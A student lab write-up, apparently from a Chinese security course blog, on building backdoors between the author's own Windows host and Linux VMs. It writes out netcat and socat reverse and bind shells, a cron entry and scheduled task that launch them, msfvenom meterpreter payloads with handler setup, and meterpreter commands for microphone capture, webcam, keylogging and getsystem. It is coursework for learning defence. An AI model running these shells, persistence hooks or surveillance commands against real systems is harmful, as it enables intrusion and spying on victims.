Exp2 后门原理与实践 ——20164316张子遥

一、实践基本内容

1.实践目标

(1)使用netcat获取主机操作Shell,cron启动 

(2)使用socat获取主机操作Shell, 任务计划启动 

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实践前期准备

在实践前期先熟悉一下ncat的使用,使用前确定Linux和Windows都安装好了ncat。

Windows中命令行中输入指令 ipconfig 查看本机ip

Linux终端中输入指令 ifconfig 查看ip地址

可以确定Windows的ip为 192.168.1.102 ;Linux的ip为 192.168.192.128 

2.1使用ncat,本机(Windows)获得虚拟机(Linux)操作shell

步骤1:win中使用ncat监听4316端口: ncat.exe -l -p 4316 

步骤2:在Linux输入指令  nc 192.168.1.102 4316 -e /bin/sh  反弹连接Windows主机的 4316 端口(指令中的ip地址需为Windows ip)

结果:本机(Windows)成功获得虚拟机(Linux)操作shell,能够进行操作。

此时本机(Windows)为攻击者,虚拟机(Linux)为靶机也就是被攻击者。

2.2使用ncat,虚拟机(Linux)获得本机(Windows)操作shell(大体步骤与上述类似)

步骤1:在Linux中监听4316端口:nc -l -p 4316

步骤2:在Windows输入指令 ncat.exe  -e cmd.exe 192.168.192.128 4316 反弹连接Linux的4316端口(指令中的ip地址需为Linux ip)

结果:虚拟机(Linux)成功获得本机(Windows)操作shell,能够执行Windows中的命令。

此时本机(Windows)为靶机,虚拟机(Linux)也就是攻击者。

 


 

 

二、实践具体步骤

目标一:使用netcat获取主机操作Shell,cron启动 

cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与windows下的计划任务类似,当安装完成操作系统后,默认会安装此服务 工具,并且会自动启动cron进程,cron进程每分钟会定期检查是否有要执行的任务,如果有要执行的任务,则自动执行该任务。

crontab文件的含义:

用户所建立的crontab文件中,每一行都代表一项任务,每行的每个字段代表一项设置,它的格式共分为六个字段,前五段是时间设定段,第六段是要执行的命令段,格式如下:minute hour day month week command

实践参考:Linux定时任务Crontab命令详解

具体步骤:

1.用 crontab -e 指令编辑定时任务,选择3,也就是基本的vim编辑器

2.vim编辑器中用  i  改为插入模式,在最后一行插入 00 21 20 3 * /bin/netcat 192.168.1.102 4316 -e /bin/sh   后输入 :wq! 保存并退出,上述指令表示在3月20号的晚上九点(21:00)反向连接Windows本机的4316端口,就会启动cron

3.在21:00之前输入 ls 指令,屏幕上并无显示,当时间到了21:00时,此时已经获得了shell,指令所得内容则显示了出来

 

目标二:使用socat获取主机操作Shell, 任务计划启动  

实践参考:socat使用笔记

socatncat的增强版,socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。作为一款双向数据流通道工具,它拥有许多强大的功能:端口的连接、端口侦听、收发文件、传递shell、端口转发、端口扫描等。

实践前在Windows安装好socat。

具体步骤:

1.win中打开控制面板,选中管理工具->任务计划程序

 

2.创建新任务,填写任务名称,新建一个触发器。

3.同时创建新操作,在操作->程序或脚本中选择 socat.exe 文件的路径,在添加参数一栏填写 tcp-listen:4316 exec:cmd.exe,pty,stderr ,这个命令的作用是把cmd.exe绑定到端口4316,同时把cmd.exestderr重定向到stdout

4.按快捷键win+L即能锁定计算机,创建的任务开始运行。

此时在Linux中输入指令 socat - tcp:192.168.1.102:4316 ,发现成功获得了cmd shell,能够输入Windows的命令

目标三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

P.S.由于重新开机,此时Windows的ip地址变更为192.168.43.137,Linux虚拟机ip地址变更为192.168.192.129.

具体步骤:

1.Linux中输入指令生成后门程序(因为靶机系统为win10的64位故在指令中参数加上x64)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.129 LPORT=4316 -f exe > 20164316.exe

 

2.使用ncat传输已经生成的20164316.exe程序文件。(通过2222端口)

i)在win中输入: ncat.exe -lv 2222 > 4316.exe 监听并接受后门程序;

ii)在Linux中输入: nc 192.168.43.137 2222 < 20164316.exe 向win传输后门程序。

 

 3.在Linux中输入指令msfconsole,进入msf命令行,msf启动监听前需要进行一些设置

use exploit/multi/handler    /*进入handler模式*/

set payload windows/x64/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/

show options  /*查看当前信息状态*/

set LHOST 192.168.192.129  /*设置LHOST,其中ip为Linux的ip*/

set LPORT 4316 /*设置LPORT*/

exploit /*启动监听*/

 

启动监听后再在win中运行后门程序,此时Linux上已经获得了Windows主机的连接,并且得到了远程控制的shell,能够输入Windows中的命令。

 

目标四:使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 

实践参考:获取shell之后进一步利用

具体步骤:

record_mic//该指令可以截获音频

webcam_snap//该指令可以使用摄像头进行拍照

screenshot//该指令可以进行截屏

keyscan_start//输入该指令开始记录下击键的过程

keyscan_dump//输入该指令读取击键的记录

 

P.S.由于本机Windows缺少摄像头驱动,所以摄像头进行拍照不能进行,webcam_snap等命令会回复缺少摄像头设备

 getuid 指令查看当前用户,使用 getsystem 指令进行提权,如图未提权成功。

在win中重新尝试以管理员身份运行后门程序后再进入msf命令行中进行提权,使用 getsystem 指令提权成功

目标五:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

实践参考:使用MSF生成shellcode

在完成该目标时,直接在两台虚拟机Linux之间进行,大致步骤与目标三相同,要点在于shellcode的生成。

具体步骤:

1.利用指令 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.192.129 LPORT=4316 -x /root/Desktop/20164316zzy -f elf > 20164316zzy_2  生成以20164316zzy为模板这个elf文件格式的shellcode文件20164316zzy_2 

(由靶机为Linux且20164316zzy这个文件是32位的来确定参数)

 2.输入指令msfconsole,进入msf命令行,msf启动监听前需要进行一些设置

use exploit/multi/handler    /*进入handler模式*/

set payload linux/x86/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/

show options  /*查看当前信息状态*/

set LHOST 192.168.192.129  /*设置LHOST,其中ip为攻击者Linux的ip*/

set LPORT 4316 /*设置LPORT*/

exploit /*启动监听*/

 

 

3.msf中启动监听,在被攻击者Linux中  ./20164316zzy_2 运行程序,此时攻击者Linux上已经获得了被攻击者Linux的连接,并且得到了远程控制的shell

 

 

失败尝试:实验中要求生成shellcode然后注入pwn可执行文件,但由于未知原因...并没有成功

具体步骤:

1.利用msf生成shellcode(要注意生成的shellcode中不能含有\x00\x0a\,可手动删除或参数设置)

这里可以直接在msf命令行中生成,也可用msfvenom指令来进行生成。(我在前后进行了两种生成方式)

2.利用实验一的知识,将生成的shellcode注入到可执行文件中。

 (要记得利用gdb调试工具来确定注入地址来覆盖esp寄存器)

3.最后两种shellcode的注入都只是得到了段错误的结果...

 同时我也采用了msf监听模式,在另一台Linux虚拟机中运行可执行文件后,msf中并没有显示有监听到任何连接...(这里忘了截图)

在网上查询有关段错误的反应大都是因为shellcode保存在内存的.data数据段是不能被执行的。

但是在步骤2注入之前都对可执行文件进行了实验一预设条件的执行,关闭了堆栈保护等。

由于自身知识的缺乏,也不能确定第一步的shellcode生成语句是否正确,所以暂时不能清楚实验失败 的原因。

 

 

 


 

三、实践所遇问题与解决

1.目标三中运行了后门程序(在任务管理器中也能看到),但是msf监听这边没有反应。

问题原因及解决:生成后门程序的语句为 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.129 LPORT=4316 -f exe > 20164316.exe  ,加上了参数x64,但是在msf的设置payload中,指令 set payload windows/meterpreter/reverse_tcp  未加上x64,是msf存在的共性问题,导致无法监听到后门程序的运行;加上参数后即能连接Windows获取shell,成功结果截图见目标三。

 


 

 

四、实践问题回答与收获

基础问题回答:

  (1)例举你能想到的一个后门进入到你系统中的可能方式?

  答:后门程序可能与我下载的某些盗版软件捆绑下载,从而下载到我的电脑。

  (2)例举你知道的后门如何启动起来(win及linux)的方式?

  答:win中后门可能与某些软件捆绑运行达到启动的目的;

             Linux中通过设置corn定时启动后门程序。

  (3)Meterpreter有哪些给你映像深刻的功能?

  答:能够获得摄像头权限和键盘使用权限并且能够监视键盘键入!让我意识到一旦被攻击,是非常恐怖的....

  (4)如何发现自己有系统有没有被安装后门?

  答:稍微低级一点的,例如360安全软件和防火墙,我在做实验时起初就因为没有关掉360杀毒软件导致后门程序一被传输过来就被杀死了。更加仔细一点的话,可以通过查看进程和利用一些抓包工具来进行分析。(前提是后门程序启动了)

 

实践收获

  此次实践让我熟悉了后门程序的生成,以及ncat、socat的使用,更让人认识到了后门的危害...而我们学习如何攻击的同时,也应该了解如何防范。在实践中,也多次查询各种资料来完成,这种解决问题的方式,让人学习得更深刻和透彻。

posted @ 2019-03-22 20:47  fearless_zzy  阅读(324)  评论(0编辑  收藏
levels of contents